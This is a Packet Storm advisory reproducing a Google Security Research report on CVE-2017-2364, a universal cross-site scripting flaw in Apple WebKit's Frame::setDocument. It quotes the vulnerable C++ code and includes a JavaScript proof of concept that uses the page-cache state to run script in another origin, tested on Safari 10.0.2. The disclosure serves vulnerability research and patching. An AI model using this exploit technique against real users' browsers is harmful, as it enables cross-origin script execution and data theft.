Apple WebKit Frame::setDocument UXSS

2017-04-09T00:00:00
ID PACKETSTORM:141952
Type packetstorm
Reporter Google Security Research
Modified 2017-04-09T00:00:00

Description

                                        
                                            ` Apple WebKit: UXSS via Frame::setDocument (1).   
  
CVE-2017-2364  
  
  
void Frame::setDocument(RefPtr<Document>&& newDocument)  
{  
ASSERT(!newDocument || newDocument->frame() == this);  
  
if (m_doc && m_doc->pageCacheState() != Document::InPageCache)  
m_doc->prepareForDestruction();  
  
m_doc = newDocument.copyRef();  
...  
}  
  
The function |prepareForDestruction| only called when the cache state is not |Document::InPageCache|. So the frame will be never detached from the cached document.  
  
PoC:  
  
"use strict";  
  
document.write("click anywhere to start");  
  
window.onclick = () => {  
let w = open("about:blank", "one");  
let d = w.document;  
  
let a = d.createElement("a");  
a.href = "<a href="https://abc.xyz/";" title="" class="" rel="nofollow">https://abc.xyz/";</a>  
a.click(); <<------- about:blank -> Document::InPageCache  
  
let it = setInterval(() => {  
try {  
w.location.href.toString;  
} catch (e) {  
clearInterval(it);  
  
let s = d.createElement("a"); <<------ about:blank's document  
s.href = "javascript:alert(location)";  
s.click();  
}  
}, 0);  
};  
  
  
Tested on Safari 10.0.2(12602.3.12.0.1).  
  
  
This bug is subject to a 90 day disclosure deadline. If 90 days elapse  
without a broadly available patch, then the bug report will automatically  
become visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`